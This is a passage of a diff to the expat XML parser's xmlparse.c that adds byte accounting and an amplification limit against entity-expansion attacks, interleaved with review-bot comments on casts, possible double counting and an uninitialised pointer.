411- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
412+ enum XML_Error result = doContent(
413+ parser, 0, parser->m_encoding, start, end, endPtr,
414+ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_ACCOUNT_DIRECT);
415 if (result == XML_ERROR_NONE) {
416 if (! storeRawNames(parser))
417 return XML_ERROR_NO_MEMORY;
418@@ -2468,6 +2584,14 @@ externalEntityInitProcessor2(XML_Parser parser, const char *start,
419 int tok = XmlContentTok(parser->m_encoding, start, end, &next);
420 switch (tok) {
421 case XML_TOK_BOM:
422+#ifdef XML_DTD
423+ if (! accountingDiffTolerated(parser, tok, start, next, __LINE__,
424+ XML_ACCOUNT_DIRECT)) {
425+ accountingOnAbort(parser);
426+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
427+ }
428+#endif /* XML_DTD */
429+
430 /* If we are at the end of the buffer, this would cause the next stage,
431 i.e. externalEntityInitProcessor3, to pass control directly to
432 doContent (by detecting XML_TOK_NONE) without processing any xml text
433@@ -2505,6 +2629,10 @@ externalEntityInitProcessor3(XML_Parser parser, const char *start,
434 const char *next = start; /* XmlContentTok doesn't always set the last arg */
435 parser->m_eventPtr = start;
436 tok = XmlContentTok(parser->m_encoding, start, end, &next);
437+ /* Note: These bytes are accounted later in:
438+ - processXmlDecl
439+ - externalEntityContentProcessor
440+ */
441 parser->m_eventEndPtr = next;
442
443 switch (tok) {
444@@ -2546,7 +2674,8 @@ externalEntityContentProcessor(XML_Parser parser, const char *start,
445 const char *end, const char **endPtr) {
446 enum XML_Error result
447 = doContent(parser, 1, parser->m_encoding, start, end, endPtr,
448- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
449+ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
450+ XML_ACCOUNT_ENTITY_EXPANSION);
451 if (result == XML_ERROR_NONE) {
452 if (! storeRawNames(parser))
453 return XML_ERROR_NO_MEMORY;
454@@ -2557,7 +2686,7 @@ externalEntityContentProcessor(XML_Parser parser, const char *start,
455 static enum XML_Error
456 doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
457 const char *s, const char *end, const char **nextPtr,
458- XML_Bool haveMore) {
459+ XML_Bool haveMore, enum XML_Account account) {
460 /* save one level of indirection */
461 DTD *const dtd = parser->m_dtd;
462
463@@ -2575,6 +2704,17 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
464 for (;;) {
465 const char *next = s; /* XmlContentTok doesn't always set the last arg */
466 int tok = XmlContentTok(enc, s, end, &next);
467+#ifdef XML_DTD
468+ const char *accountAfter
469+ = ((tok == XML_TOK_TRAILING_RSQB) || (tok == XML_TOK_TRAILING_CR))
470+ ? (haveMore ? s /* i.e. 0 bytes */ : end)
471+ : next;
472+ if (! accountingDiffTolerated(parser, tok, s, accountAfter, __LINE__,
473+ account)) {
474+ accountingOnAbort(parser);
475+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
476+ }
477+#endif
478 *eventEndPP = next;
479 switch (tok) {
480 case XML_TOK_TRAILING_CR:
481@@ -2630,6 +2770,14 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
482 XML_Char ch = (XML_Char)XmlPredefinedEntityName(
483 enc, s + enc->minBytesPerChar, next - enc->minBytesPerChar);
484 if (ch) {
485+#ifdef XML_DTD
486+ /* NOTE: We are replacing 4-6 characters original input for 1 character
487+ * so there is no amplification and hence recording without
488+ * protection. */
489+ accountingDiffTolerated(parser, tok, (char *)&ch,
490+ ((char *)&ch) + sizeof(XML_Char), __LINE__,
491+ XML_ACCOUNT_ENTITY_EXPANSION);
492+#endif /* XML_DTD */
493 if (parser->m_characterDataHandler)
494 parser->m_characterDataHandler(parser->m_handlerArg, &ch, 1);
495 else if (parser->m_defaultHandler)
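Review bot: The result of accountingDiffTolerated is dropped on purpose here, as the NOTE explains, but the other call sites in this patch test it. Writing `(void)accountingDiffTolerated(...)` would make the discard visibly deliberate and keep unused-result warnings quiet. The pointer casts can be `(const char *)&ch`, since the prototype takes `const char *before, const char *after` and the patch already switches to const casts in appendAttributeValue. The same applies to the predefined-entity branch added to appendAttributeValue further down. The enclosing doContent body lies outside this hunk.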
496@@ -2748,7 +2896,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
497 }
498 tag->name.str = (XML_Char *)tag->buf;
499 *toPtr = XML_T('\0');
500- result = storeAtts(parser, enc, s, &(tag->name), &(tag->bindings));
501+ result
502+ = storeAtts(parser, enc, s, &(tag->name), &(tag->bindings), account);
503 if (result)
504 return result;
505 if (parser->m_startElementHandler)
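Review bot: This call forwards `account` to storeAtts, whereas the empty-element call in the next hunk passes `XML_ACCOUNT_NONE /* token spans whole start tag */`. Every token in the doContent loop is already passed to accountingDiffTolerated before the switch, so on this path the attribute-value bytes look like they are counted a second time, unless there is a reason that is not visible in the hunk. Either pass `XML_ACCOUNT_NONE` here as well or add a comment explaining why the two start-tag paths differ. Counting direct bytes twice would presumably skew the ratio the amplification limit is computed from.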
506@@ -2772,7 +2921,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
507 if (! name.str)
508 return XML_ERROR_NO_MEMORY;
509 poolFinish(&parser->m_tempPool);
510- result = storeAtts(parser, enc, s, &name, &bindings);
511+ result = storeAtts(parser, enc, s, &name, &bindings,
512+ XML_ACCOUNT_NONE /* token spans whole start tag */);
513 if (result != XML_ERROR_NONE) {
514 freeBindings(parser, bindings);
515 return result;
516@@ -2907,7 +3057,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
517 /* END disabled code */
518 else if (parser->m_defaultHandler)
519 reportDefault(parser, enc, s, next);
520- result = doCdataSection(parser, enc, &next, end, nextPtr, haveMore);
521+ result
522+ = doCdataSection(parser, enc, &next, end, nextPtr, haveMore, account);
523 if (result != XML_ERROR_NONE)
524 return result;
525 else if (! next) {
526@@ -3036,7 +3187,8 @@ freeBindings(XML_Parser parser, BINDING *bindings) {
527 */
528 static enum XML_Error
529 storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
530- TAG_NAME *tagNamePtr, BINDING **bindingsPtr) {
531+ TAG_NAME *tagNamePtr, BINDING **bindingsPtr,
532+ enum XML_Account account) {
533 DTD *const dtd = parser->m_dtd; /* save one level of indirection */
534 ELEMENT_TYPE *elementType;
535 int nDefaultAtts;
536@@ -3146,7 +3298,7 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
537 /* normalize the attribute value */
538 result = storeAttributeValue(
539 parser, enc, isCdata, parser->m_atts[i].valuePtr,
540- parser->m_atts[i].valueEnd, &parser->m_tempPool);
541+ parser->m_atts[i].valueEnd, &parser->m_tempPool, account);
542 if (result)
543 return result;
544 appAtts[attIndex] = poolStart(&parser->m_tempPool);
545@@ -3535,9 +3687,9 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
546 static enum XML_Error PTRCALL
547 cdataSectionProcessor(XML_Parser parser, const char *start, const char *end,
548 const char **endPtr) {
549- enum XML_Error result
550- = doCdataSection(parser, parser->m_encoding, &start, end, endPtr,
551- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
552+ enum XML_Error result = doCdataSection(
553+ parser, parser->m_encoding, &start, end, endPtr,
554+ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_ACCOUNT_DIRECT);
555 if (result != XML_ERROR_NONE)
556 return result;
557 if (start) {
558@@ -3557,7 +3709,8 @@ cdataSectionProcessor(XML_Parser parser, const char *start, const char *end,
559 */
560 static enum XML_Error
561 doCdataSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
562- const char *end, const char **nextPtr, XML_Bool haveMore) {
563+ const char *end, const char **nextPtr, XML_Bool haveMore,
564+ enum XML_Account account) {
565 const char *s = *startPtr;
566 const char **eventPP;
567 const char **eventEndPP;
568@@ -3575,6 +3728,14 @@ doCdataSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
569 for (;;) {
570 const char *next;
571 int tok = XmlCdataSectionTok(enc, s, end, &next);
572+#ifdef XML_DTD
573+ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__, account)) {
574+ accountingOnAbort(parser);
575+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
576+ }
577+#else
578+ UNUSED_P(account);
579+#endif
580 *eventEndPP = next;
581 switch (tok) {
582 case XML_TOK_CDATA_SECT_CLOSE:
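Review bot: `next` is declared without an initialiser and is now read by accountingDiffTolerated before `tok` is inspected. A comment in doContent notes that XmlContentTok does not always set its last argument; if XmlCdataSectionTok behaves the same way for tokens such as XML_TOK_NONE, the call receives an indeterminate pointer. Initialise it as doContent does, `const char *next = s; /* tokenizer doesn't always set the last arg */`, even if accountingDiffTolerated (whose body is not in this hunk) ignores `after` for such tokens. The hunks for appendAttributeValue and storeEntityValue add the same call after a bare `const char *next;`, and epilogProcessor does so with `next` initialised to NULL.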
583@@ -3719,6 +3880,13 @@ doIgnoreSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
584 *eventPP = s;
585 *startPtr = NULL;
586 tok = XmlIgnoreSectionTok(enc, s, end, &next);
587+# ifdef XML_DTD
588+ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
589+ XML_ACCOUNT_DIRECT)) {
590+ accountingOnAbort(parser);
591+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
592+ }
593+# endif
594 *eventEndPP = next;
595 switch (tok) {
596 case XML_TOK_IGNORE_SECT:
597@@ -3803,6 +3971,15 @@ processXmlDecl(XML_Parser parser, int isGeneralTextEntity, const char *s,
598 const char *versionend;
599 const XML_Char *storedversion = NULL;
600 int standalone = -1;
601+
602+#ifdef XML_DTD
603+ if (! accountingDiffTolerated(parser, XML_TOK_XML_DECL, s, next, __LINE__,
604+ XML_ACCOUNT_DIRECT)) {
605+ accountingOnAbort(parser);
606+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
607+ }
608+#endif
609+
610 if (! (parser->m_ns ? XmlParseXmlDeclNS : XmlParseXmlDecl)(
611 isGeneralTextEntity, parser->m_encoding, s, next, &parser->m_eventPtr,
612 &version, &versionend, &encodingName, &newEncoding, &standalone)) {
613@@ -3952,6 +4129,10 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
614
615 for (;;) {
616 tok = XmlPrologTok(parser->m_encoding, start, end, &next);
617+ /* Note: Except for XML_TOK_BOM below, these bytes are accounted later in:
618+ - storeEntityValue
619+ - processXmlDecl
620+ */
621 parser->m_eventEndPtr = next;
622 if (tok <= 0) {
623 if (! parser->m_parsingStatus.finalBuffer && tok != XML_TOK_INVALID) {
624@@ -3970,7 +4151,8 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
625 break;
626 }
627 /* found end of entity value - can store it now */
628- return storeEntityValue(parser, parser->m_encoding, s, end);
629+ return storeEntityValue(parser, parser->m_encoding, s, end,
630+ XML_ACCOUNT_DIRECT);
631 } else if (tok == XML_TOK_XML_DECL) {
632 enum XML_Error result;
633 result = processXmlDecl(parser, 0, start, next);
634@@ -3997,6 +4179,14 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
635 */
636 else if (tok == XML_TOK_BOM && next == end
637 && ! parser->m_parsingStatus.finalBuffer) {
638+# ifdef XML_DTD
639+ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
640+ XML_ACCOUNT_DIRECT)) {
641+ accountingOnAbort(parser);
642+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
643+ }
644+# endif
645+
646 *nextPtr = next;
647 return XML_ERROR_NONE;
648 }
649@@ -4039,16 +4229,24 @@ externalParEntProcessor(XML_Parser parser, const char *s, const char *end,
650 }
651 /* This would cause the next stage, i.e. doProlog to be passed XML_TOK_BOM.
652 However, when parsing an external subset, doProlog will not accept a BOM
653- as valid, and report a syntax error, so we have to skip the BOM
654+ as valid, and report a syntax error, so we have to skip the BOM, and
655+ account for the BOM bytes.
656 */
657 else if (tok == XML_TOK_BOM) {
658+ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
659+ XML_ACCOUNT_DIRECT)) {
660+ accountingOnAbort(parser);
661+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
662+ }
663+
664 s = next;
665 tok = XmlPrologTok(parser->m_encoding, s, end, &next);
666 }
667
668 parser->m_processor = prologProcessor;
669 return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
670- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
671+ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
672+ XML_ACCOUNT_DIRECT);
673 }
674
675 static enum XML_Error PTRCALL
676@@ -4061,6 +4259,9 @@ entityValueProcessor(XML_Parser parser, const char *s, const char *end,
677
678 for (;;) {
679 tok = XmlPrologTok(enc, start, end, &next);
680+ /* Note: These bytes are accounted later in:
681+ - storeEntityValue
682+ */
683 if (tok <= 0) {
684 if (! parser->m_parsingStatus.finalBuffer && tok != XML_TOK_INVALID) {
685 *nextPtr = s;
686@@ -4078,7 +4279,7 @@ entityValueProcessor(XML_Parser parser, const char *s, const char *end,
687 break;
688 }
689 /* found end of entity value - can store it now */
690- return storeEntityValue(parser, enc, s, end);
691+ return storeEntityValue(parser, enc, s, end, XML_ACCOUNT_DIRECT);
692 }
693 start = next;
694 }
695@@ -4092,13 +4293,14 @@ prologProcessor(XML_Parser parser, const char *s, const char *end,
696 const char *next = s;
697 int tok = XmlPrologTok(parser->m_encoding, s, end, &next);
698 return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
699- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
700+ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
701+ XML_ACCOUNT_DIRECT);
702 }
703
704 static enum XML_Error
705 doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
706 int tok, const char *next, const char **nextPtr, XML_Bool haveMore,
707- XML_Bool allowClosingDoctype) {
708+ XML_Bool allowClosingDoctype, enum XML_Account account) {
709 #ifdef XML_DTD
710 static const XML_Char externalSubsetName[] = {ASCII_HASH, '\0'};
711 #endif /* XML_DTD */
712@@ -4125,6 +4327,10 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
713 static const XML_Char enumValueSep[] = {ASCII_PIPE, '\0'};
714 static const XML_Char enumValueStart[] = {ASCII_LPAREN, '\0'};
715
716+#ifndef XML_DTD
717+ UNUSED_P(account);
718+#endif
719+
720 /* save one level of indirection */
721 DTD *const dtd = parser->m_dtd;
722
723@@ -4189,6 +4395,19 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
724 }
725 }
726 role = XmlTokenRole(&parser->m_prologState, tok, s, next, enc);
727+#ifdef XML_DTD
728+ switch (role) {
729+ case XML_ROLE_INSTANCE_START: // bytes accounted in contentProcessor
730+ case XML_ROLE_XML_DECL: // bytes accounted in processXmlDecl
731+ case XML_ROLE_TEXT_DECL: // bytes accounted in processXmlDecl
732+ break;
733+ default:
734+ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__, account)) {
735+ accountingOnAbort(parser);
736+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
737+ }
738+ }
739+#endif
740 switch (role) {
741 case XML_ROLE_XML_DECL: {
742 enum XML_Error result = processXmlDecl(parser, 0, s, next);
743@@ -4464,7 +4683,8 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
744 const XML_Char *attVal;
745 enum XML_Error result = storeAttributeValue(
746 parser, enc, parser->m_declAttributeIsCdata,
747- s + enc->minBytesPerChar, next - enc->minBytesPerChar, &dtd->pool);
748+ s + enc->minBytesPerChar, next - enc->minBytesPerChar, &dtd->pool,
749+ XML_ACCOUNT_NONE);
750 if (result)
751 return result;
752 attVal = poolStart(&dtd->pool);
753@@ -4497,8 +4717,9 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
754 break;
755 case XML_ROLE_ENTITY_VALUE:
756 if (dtd->keepProcessing) {
757- enum XML_Error result = storeEntityValue(
758- parser, enc, s + enc->minBytesPerChar, next - enc->minBytesPerChar);
759+ enum XML_Error result
760+ = storeEntityValue(parser, enc, s + enc->minBytesPerChar,
761+ next - enc->minBytesPerChar, XML_ACCOUNT_NONE);
762 if (parser->m_declEntity) {
763 parser->m_declEntity->textPtr = poolStart(&dtd->entityValuePool);
764 parser->m_declEntity->textLen
765@@ -4888,12 +5109,15 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
766 if (parser->m_externalEntityRefHandler) {
767 dtd->paramEntityRead = XML_FALSE;
768 entity->open = XML_TRUE;
769+ entityTrackingOnOpen(parser, entity, __LINE__);
770 if (! parser->m_externalEntityRefHandler(
771 parser->m_externalEntityRefHandlerArg, 0, entity->base,
772 entity->systemId, entity->publicId)) {
773+ entityTrackingOnClose(parser, entity, __LINE__);
774 entity->open = XML_FALSE;
775 return XML_ERROR_EXTERNAL_ENTITY_HANDLING;
776 }
777+ entityTrackingOnClose(parser, entity, __LINE__);
778 entity->open = XML_FALSE;
779 handleDefault = XML_FALSE;
780 if (! dtd->paramEntityRead) {
781@@ -5091,6 +5315,13 @@ epilogProcessor(XML_Parser parser, const char *s, const char *end,
782 for (;;) {
783 const char *next = NULL;
784 int tok = XmlPrologTok(parser->m_encoding, s, end, &next);
785+#ifdef XML_DTD
786+ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
787+ XML_ACCOUNT_DIRECT)) {
788+ accountingOnAbort(parser);
789+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
790+ }
791+#endif
792 parser->m_eventEndPtr = next;
793 switch (tok) {
794 /* report partial linebreak - it might be the last token */
795@@ -5164,6 +5395,9 @@ processInternalEntity(XML_Parser parser, ENTITY *entity, XML_Bool betweenDecl) {
796 return XML_ERROR_NO_MEMORY;
797 }
798 entity->open = XML_TRUE;
799+#ifdef XML_DTD
800+ entityTrackingOnOpen(parser, entity, __LINE__);
801+#endif
802 entity->processed = 0;
803 openEntity->next = parser->m_openInternalEntities;
804 parser->m_openInternalEntities = openEntity;
805@@ -5182,17 +5416,22 @@ processInternalEntity(XML_Parser parser, ENTITY *entity, XML_Bool betweenDecl) {
806 int tok
807 = XmlPrologTok(parser->m_internalEncoding, textStart, textEnd, &next);
808 result = doProlog(parser, parser->m_internalEncoding, textStart, textEnd,
809- tok, next, &next, XML_FALSE, XML_FALSE);
810+ tok, next, &next, XML_FALSE, XML_FALSE,
811+ XML_ACCOUNT_ENTITY_EXPANSION);
812 } else
813 #endif /* XML_DTD */
814 result = doContent(parser, parser->m_tagLevel, parser->m_internalEncoding,
815- textStart, textEnd, &next, XML_FALSE);
816+ textStart, textEnd, &next, XML_FALSE,
817+ XML_ACCOUNT_ENTITY_EXPANSION);
818
819 if (result == XML_ERROR_NONE) {
820 if (textEnd != next && parser->m_parsingStatus.parsing == XML_SUSPENDED) {
821 entity->processed = (int)(next - textStart);
822 parser->m_processor = internalEntityProcessor;
823 } else {
824+#ifdef XML_DTD
825+ entityTrackingOnClose(parser, entity, __LINE__);
826+#endif /* XML_DTD */
827 entity->open = XML_FALSE;
828 parser->m_openInternalEntities = openEntity->next;
829 /* put openEntity back in list of free instances */
830@@ -5225,12 +5464,13 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
831 int tok
832 = XmlPrologTok(parser->m_internalEncoding, textStart, textEnd, &next);
833 result = doProlog(parser, parser->m_internalEncoding, textStart, textEnd,
834- tok, next, &next, XML_FALSE, XML_TRUE);
835+ tok, next, &next, XML_FALSE, XML_TRUE,
836+ XML_ACCOUNT_ENTITY_EXPANSION);
837 } else
838 #endif /* XML_DTD */
839 result = doContent(parser, openEntity->startTagLevel,
840 parser->m_internalEncoding, textStart, textEnd, &next,
841- XML_FALSE);
842+ XML_FALSE, XML_ACCOUNT_ENTITY_EXPANSION);
843
844 if (result != XML_ERROR_NONE)
845 return result;
846@@ -5239,6 +5479,9 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
847 entity->processed = (int)(next - (char *)entity->textPtr);
848 return result;
849 } else {
850+#ifdef XML_DTD
851+ entityTrackingOnClose(parser, entity, __LINE__);
852+#endif
853 entity->open = XML_FALSE;
854 parser->m_openInternalEntities = openEntity->next;
855 /* put openEntity back in list of free instances */
856@@ -5252,7 +5495,8 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
857 parser->m_processor = prologProcessor;
858 tok = XmlPrologTok(parser->m_encoding, s, end, &next);
859 return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
860- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
861+ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
862+ XML_ACCOUNT_DIRECT);
863 } else
864 #endif /* XML_DTD */
865 {
866@@ -5260,7 +5504,8 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
867 /* see externalEntityContentProcessor vs contentProcessor */
868 return doContent(parser, parser->m_parentParser ? 1 : 0, parser->m_encoding,
869 s, end, nextPtr,
870- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
871+ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
872+ XML_ACCOUNT_DIRECT);
873 }
874 }
875
876@@ -5275,9 +5520,10 @@ errorProcessor(XML_Parser parser, const char *s, const char *end,
877
878 static enum XML_Error
879 storeAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
880- const char *ptr, const char *end, STRING_POOL *pool) {
881+ const char *ptr, const char *end, STRING_POOL *pool,
882+ enum XML_Account account) {
883 enum XML_Error result
884- = appendAttributeValue(parser, enc, isCdata, ptr, end, pool);
885+ = appendAttributeValue(parser, enc, isCdata, ptr, end, pool, account);
886 if (result)
887 return result;
888 if (! isCdata && poolLength(pool) && poolLastChar(pool) == 0x20)
889@@ -5289,11 +5535,22 @@ storeAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
890
891 static enum XML_Error
892 appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
893- const char *ptr, const char *end, STRING_POOL *pool) {
894+ const char *ptr, const char *end, STRING_POOL *pool,
895+ enum XML_Account account) {
896 DTD *const dtd = parser->m_dtd; /* save one level of indirection */
897+#ifndef XML_DTD
898+ UNUSED_P(account);
899+#endif
900+
901 for (;;) {
902 const char *next;
903 int tok = XmlAttributeValueTok(enc, ptr, end, &next);
904+#ifdef XML_DTD
905+ if (! accountingDiffTolerated(parser, tok, ptr, next, __LINE__, account)) {
906+ accountingOnAbort(parser);
907+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
908+ }
909+#endif
910 switch (tok) {
911 case XML_TOK_NONE:
912 return XML_ERROR_NONE;
913@@ -5353,6 +5610,14 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
914 XML_Char ch = (XML_Char)XmlPredefinedEntityName(
915 enc, ptr + enc->minBytesPerChar, next - enc->minBytesPerChar);
916 if (ch) {
917+#ifdef XML_DTD
918+ /* NOTE: We are replacing 4-6 characters original input for 1 character
919+ * so there is no amplification and hence recording without
920+ * protection. */
921+ accountingDiffTolerated(parser, tok, (char *)&ch,
922+ ((char *)&ch) + sizeof(XML_Char), __LINE__,
923+ XML_ACCOUNT_ENTITY_EXPANSION);
924+#endif /* XML_DTD */
925 if (! poolAppendChar(pool, ch))
926 return XML_ERROR_NO_MEMORY;
927 break;
928@@ -5430,9 +5695,16 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
929 enum XML_Error result;
930 const XML_Char *textEnd = entity->textPtr + entity->textLen;
931 entity->open = XML_TRUE;
932+#ifdef XML_DTD
933+ entityTrackingOnOpen(parser, entity, __LINE__);
934+#endif
935 result = appendAttributeValue(parser, parser->m_internalEncoding,
936- isCdata, (char *)entity->textPtr,
937- (char *)textEnd, pool);
938+ isCdata, (const char *)entity->textPtr,
939+ (const char *)textEnd, pool,
940+ XML_ACCOUNT_ENTITY_EXPANSION);
941+#ifdef XML_DTD
942+ entityTrackingOnClose(parser, entity, __LINE__);
943+#endif
944 entity->open = XML_FALSE;
945 if (result)
946 return result;
947@@ -5462,13 +5734,16 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
948
949 static enum XML_Error
950 storeEntityValue(XML_Parser parser, const ENCODING *enc,
951- const char *entityTextPtr, const char *entityTextEnd) {
952+ const char *entityTextPtr, const char *entityTextEnd,
953+ enum XML_Account account) {
954 DTD *const dtd = parser->m_dtd; /* save one level of indirection */
955 STRING_POOL *pool = &(dtd->entityValuePool);
956 enum XML_Error result = XML_ERROR_NONE;
957 #ifdef XML_DTD
958 int oldInEntityValue = parser->m_prologState.inEntityValue;
959 parser->m_prologState.inEntityValue = 1;
960+#else
961+ UNUSED_P(account);
962 #endif /* XML_DTD */
963 /* never return Null for the value argument in EntityDeclHandler,
964 since this would indicate an external entity; therefore we
965@@ -5481,6 +5756,16 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
966 for (;;) {
967 const char *next;
968 int tok = XmlEntityValueTok(enc, entityTextPtr, entityTextEnd, &next);
969+
970+#ifdef XML_DTD
971+ if (! accountingDiffTolerated(parser, tok, entityTextPtr, next, __LINE__,
972+ account)) {
973+ accountingOnAbort(parser);
974+ result = XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
975+ goto endEntityValue;
976+ }
977+#endif
978+
979 switch (tok) {
980 case XML_TOK_PARAM_ENTITY_REF:
981 #ifdef XML_DTD
982@@ -5516,13 +5801,16 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
983 if (parser->m_externalEntityRefHandler) {
984 dtd->paramEntityRead = XML_FALSE;
985 entity->open = XML_TRUE;
986+ entityTrackingOnOpen(parser, entity, __LINE__);
987 if (! parser->m_externalEntityRefHandler(
988 parser->m_externalEntityRefHandlerArg, 0, entity->base,
989 entity->systemId, entity->publicId)) {
990+ entityTrackingOnClose(parser, entity, __LINE__);
991 entity->open = XML_FALSE;
992 result = XML_ERROR_EXTERNAL_ENTITY_HANDLING;
993 goto endEntityValue;
994 }
995+ entityTrackingOnClose(parser, entity, __LINE__);
996 entity->open = XML_FALSE;
997 if (! dtd->paramEntityRead)
998 dtd->keepProcessing = dtd->standalone;
999@@ -5530,9 +5818,12 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
1000 dtd->keepProcessing = dtd->standalone;
1001 } else {
1002 entity->open = XML_TRUE;
1003+ entityTrackingOnOpen(parser, entity, __LINE__);
1004 result = storeEntityValue(
1005- parser, parser->m_internalEncoding, (char *)entity->textPtr,
1006- (char *)(entity->textPtr + entity->textLen));
1007+ parser, parser->m_internalEncoding, (const char *)entity->textPtr,
1008+ (const char *)(entity->textPtr + entity->textLen),
1009+ XML_ACCOUNT_ENTITY_EXPANSION);
1010+ entityTrackingOnClose(parser, entity, __LINE__);
1011 entity->open = XML_FALSE;
1012 if (result)
1013 goto endEntityValue;
1014@@ -6893,3 +7184,741 @@ copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
1015 memcpy(result, s, charsRequired * sizeof(XML_Char));
1016 return result;
1017 }
1018+
1019+#ifdef XML_DTD
1020+
1021+static float
1022+accountingGetCurrentAmplification(XML_Parser rootParser) {
1023+ const XmlBigCount countBytesOutput
1024+ = rootParser->m_accounting.countBytesDirect
1025+ + rootParser->m_accounting.countBytesIndirect;
1026+ const float amplificationFactor
1027+ = rootParser->m_accounting.countBytesDirect
1028+ ? (countBytesOutput
1029+ / (float)(rootParser->m_accounting.countBytesDirect))
1030+ : 1.0f;
1031+ assert(! rootParser->m_parentParser);
1032+ return amplificationFactor;
1033+}
1034+
1035+static void
1036+accountingReportStats(XML_Parser originParser, const char *epilog) {
1037+ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
1038+ assert(! rootParser->m_parentParser);
1039+
1040+ if (rootParser->m_accounting.debugLevel < 1) {
1041+ return;
1042+ }
1043+
1044+ const float amplificationFactor
1045+ = accountingGetCurrentAmplification(rootParser);
1046+ fprintf(stderr,
1047+ "expat: Accounting(%p): Direct " EXPAT_FMT_ULL(
1048+ "10") ", indirect " EXPAT_FMT_ULL("10") ", amplification %8.2f%s",
1049+ (void *)rootParser, rootParser->m_accounting.countBytesDirect,
1050+ rootParser->m_accounting.countBytesIndirect,
1051+ (double)amplificationFactor, epilog);
1052+}
1053+
1054+static void
1055+accountingOnAbort(XML_Parser originParser) {
1056+ accountingReportStats(originParser, " ABORTING\n");
1057+}
1058+
1059+static void
1060+accountingReportDiff(XML_Parser rootParser,
1061+ unsigned int levelsAwayFromRootParser, const char *before,
1062+ const char *after, ptrdiff_t bytesMore, int source_line,
1063+ enum XML_Account account) {
1064+ assert(! rootParser->m_parentParser);
1065+
1066+ fprintf(stderr,
1067+ " (+" EXPAT_FMT_PTRDIFF_T("6") " bytes %s|%d, xmlparse.c:%d) %*s\"",
1068+ bytesMore, (account == XML_ACCOUNT_DIRECT) ? "DIR" : "EXP",
1069+ levelsAwayFromRootParser, source_line, 10, "");
1070+
1071+ const char ellipis[] = "[..]";
1072+ const size_t ellipsisLength = sizeof(ellipis) /* because compile-time */ - 1;
1073+ const unsigned int contextLength = 10;
1074+
1075+ /* Note: Performance is of no concern here */
1076+ const char *walker = before;
1077+ if ((rootParser->m_accounting.debugLevel >= 3)
1078+ || (after - before)
1079+ <= (ptrdiff_t)(contextLength + ellipsisLength + contextLength)) {
1080+ for (; walker < after; walker++) {
1081+ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
1082+ }
1083+ } else {
1084+ for (; walker < before + contextLength; walker++) {
